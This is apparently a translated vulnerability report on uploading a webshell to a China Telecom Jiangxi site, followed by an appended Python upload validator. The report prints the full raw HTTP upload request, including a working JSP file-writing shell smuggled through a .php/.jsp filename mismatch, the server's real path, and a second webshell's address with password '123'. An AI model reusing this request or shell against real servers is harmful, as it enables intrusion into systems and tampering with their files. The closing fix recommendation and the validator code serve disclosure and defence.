China Telecom Jiangxi main site: getshell by bypassing the WAF
Getshell verification
Address: http://**.**.**.**/res/active/4G/upload.jsp (login required). The upload vulnerability is on a host that also runs security software, so all my webshells got killed.
However, this is not the focus.
First, upload the small shell (the "pony"):
POST http://**.**.**.**/AttachmentServlet?backUrl=/service/upload/img_upload.jsp HTTP/1.1
Host: **.**.**.**
Connection: keep-alive
Content-Length: 1912
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 QIHU 360EE
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytrI8QHebOAmXLH47
Referer: http://**.**.**.**/service/upload/img_upload.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: s_fid=7BC739F3593E85F7-08481DCFE53A3A4E; lvid=1d399cc664257927153a6c35ee4ff517; nvid=1; cityCode=bj; SHOPID_COOKIEID=10001; NETJSESSIONID1=mZB6WVKBzT2FHtMzJQsQHL2XKwXnptCVV6d8TGW5Hpwmnwz0DJvt!1311323526; _pk_ref.345.1592=%5B%22%22%2C%22%22%2C1448462879%2C%22https%3A%2F%2F**.**.**.**%2Flink%3Furl%3DAdVaFcKcHEIDY_dgfI7lFNi07sx14l5wvtP6LLBt1KfJf4ocSDar9jooSmBxFHkx4XLQLPYBXj_lg5viFvr1ya%26wd%3D%26eqid%3Df78656fa000104b7000000045655c9fe%22%2C%220%22%5D; Hm_lvt_4ae12616aa0a873fc63cbdccf4a2e47a=1448462879; Hm_lpvt_4ae12616aa0a873fc63cbdccf4a2e47a=1448462910; _pk_id.345.1592=c1efc092521c47e5.1448462879.1.1448462910.1448462879.; _pk_ses.345.1592=*

------WebKitFormBoundarytrI8QHebOAmXLH47
Content-Disposition: form-data; name="uploadFile"; filename="240.php"
Content-Type: image/jpeg

<%@page contentType="text/html; charset=GBK" import="**.**.**.**.*;"%><%
String path=request.getParameter("path");
String content=request.getParameter("content");
String url=request.getRequestURI();
String relativeurl=url.substring(url.indexOf('/',1));
String absolutepath=application.getRealPath(relativeurl);
if (path!=null && !path.equals("") && content!=null && !content.equals("")){
  try{
    File newfile=new File(path);
    PrintWriter writer=new PrintWriter(newfile);
    writer.println(content);
    writer.close();
    if (newfile.exists() && newfile.length()>0) {
      out.println("1!");
    }else{
      out.println("2!");
    }
  }catch(Exception e) {
    e.printStackTrace();
  }
}
out.println("");
%>
------WebKitFormBoundarytrI8QHebOAmXLH47
Content-Disposition: form-data; name="fileName"

240.jsp
------WebKitFormBoundarytrI8QHebOAmXLH47
Content-Disposition: form-data; name="filePath"

C:\fakepath\240.jpg
------WebKitFormBoundarytrI8QHebOAmXLH47
Content-Disposition: form-data; name="comments"

240.jpg
------WebKitFormBoundarytrI8QHebOAmXLH47
Content-Disposition: form-data; name="rela_no"

content
------WebKitFormBoundarytrI8QHebOAmXLH47--

Two things in this request matter. The multipart part is declared as filename="240.php" with Content-Type image/jpeg, while the separate fileName form field carries 240.jsp, and the file the server stores ends up with a .jsp extension (see the address below). The uploaded page itself is a minimal file-writing shell: it takes a path and a content parameter, writes content to path with a PrintWriter, and prints 1! if the file exists and is non-empty, 2! otherwise. (The import attribute has been masked by the reporting platform; File and PrintWriter are java.io classes.)
Small-shell address: http://**.**/temp/res/upload/20151125/images/20151125231655.jsp
Note that the path the small shell reports for itself is not the real one; fortunately the upload response returns the actual filesystem path:
/Home/weblogic/Oracle/Middleware/wssnet/temp/res/upload/20151125/images/
Next you still need a webshell that evades the security software, and upload it through the small shell.
http://**.**/temp/res/upload/20151125/images/55.jsp, password 123
I'm afraid I'll get beaten up. What if they come to my house?
Fix recommendation:
Validate file uploads server-side: check the extension against an allowlist and do not derive the stored name or extension from the client-supplied multipart filename or the fileName field.
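As an added example (not part of the report, and not the site's own code), the following Python models the upload request above and the server-side validation the fix recommendation calls for. The request names the file three different ways (240.php in the multipart header, 240.jsp in the fileName field, 240.jpg in filePath), so a check that looks at only one of them can be talked past; the validator here therefore extracts every client-supplied name with a small multipart parser, requires all of them to agree on an allowlisted image extension, checks the bytes against the image's magic rather than the declared Content-Type, refuses JSP scriptlet tags in the body, and lets the server pick the stored name. The boundary and field names are copied from the request; the JSP stub and the benign JPEG are constructed sample input.

```python
import os
import re
import secrets

# Boundary and field names copied from the request in the report; the uploaded
# JSP body below is a constructed stub, not the original shell.
BOUNDARY = "----WebKitFormBoundarytrI8QHebOAmXLH47"
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
MAGIC = {".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff",
         ".png": b"\x89PNG\r\n\x1a\n", ".gif": b"GIF8"}


def encode_part(name, data, filename=None, content_type=None):
    """One multipart/form-data part: CRLF-terminated headers, blank line, raw bytes."""
    disp = f'Content-Disposition: form-data; name="{name}"'
    if filename is not None:
        disp += f'; filename="{filename}"'
    head = disp + "\r\n"
    if content_type:
        head += f"Content-Type: {content_type}\r\n"
    return ("--" + BOUNDARY + "\r\n" + head + "\r\n").encode() + data + b"\r\n"


def build_body(parts):
    return b"".join(parts) + ("--" + BOUNDARY + "--\r\n").encode()


# Constructed body modelled on the report's request: the multipart filename says
# .php with an image/jpeg Content-Type, while the fileName field says .jsp.
REPORT_BODY = build_body([
    encode_part("uploadFile", b'<%@page contentType="text/html"%><% out.println(1); %>',
                filename="240.php", content_type="image/jpeg"),
    encode_part("fileName", b"240.jsp"),
    encode_part("filePath", b"C:\\fakepath\\240.jpg"),
    encode_part("comments", b"240.jpg"),
    encode_part("rela_no", b"content"),
])

# Constructed benign upload for comparison: consistent names and real JPEG magic.
BENIGN_BODY = build_body([
    encode_part("uploadFile", b"\xff\xd8\xff\xe0" + b"\x00" * 32,
                filename="cat.jpg", content_type="image/jpeg"),
    encode_part("fileName", b"cat.jpg"),
    encode_part("filePath", b"C:\\fakepath\\cat.jpg"),
])


def parse_multipart(body, boundary):
    """Minimal multipart/form-data parser; returns one dict per part."""
    delim = ("--" + boundary).encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):
            break                                    # closing delimiter
        chunk = chunk[2:] if chunk.startswith(b"\r\n") else chunk
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):
            data = data[:-2]                         # CRLF before the next delimiter
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            k, _, v = line.partition(":")
            headers[k.strip().lower()] = v.strip()
        params = dict(re.findall(r'(\w+)="([^"]*)"', headers.get("content-disposition", "")))
        parts.append({"name": params.get("name"), "filename": params.get("filename"),
                      "content_type": headers.get("content-type"), "data": data})
    return parts


def _ext(name):
    # Normalise Windows paths such as C:\fakepath\240.jpg before taking the extension.
    return os.path.splitext(os.path.basename(name.replace("\\", "/")))[1].lower()


def validate_upload(parts):
    """Server-side checks. Returns (accepted, reasons, server_chosen_name)."""
    fields = {p["name"]: p for p in parts}
    f = fields.get("uploadFile")
    if f is None or f["filename"] is None:
        return False, ["no file part"], None
    reasons = []
    # Every client-supplied name is checked, not just the multipart filename.
    names = [f["filename"]] + [fields[k]["data"].decode("latin-1")
                               for k in ("fileName", "filePath") if k in fields]
    exts = {_ext(n) for n in names}
    if exts - ALLOWED_EXT:
        reasons.append("disallowed extension(s): " + ", ".join(sorted(exts - ALLOWED_EXT)))
    if len(exts) != 1:
        reasons.append("extension differs between filename and form fields")
    ext = next(iter(exts)) if len(exts) == 1 else None
    # The declared Content-Type is ignored; the bytes must carry the image's magic.
    if ext in MAGIC and not f["data"].startswith(MAGIC[ext]):
        reasons.append("content does not match the magic bytes for " + ext)
    if b"<%" in f["data"]:
        reasons.append("JSP scriptlet tag in upload body")
    if reasons:
        return False, reasons, None
    # The server chooses the stored name; the extension comes from the allowlist.
    return True, [], secrets.token_hex(16) + ext
```

Run against REPORT_BODY the validator rejects the upload on three counts (disallowed .php/.jsp, inconsistent extensions, scriptlet tag in the body); BENIGN_BODY is accepted and stored under a random hex name ending in .jpg, so nothing the client sent ever reaches the filesystem as a name.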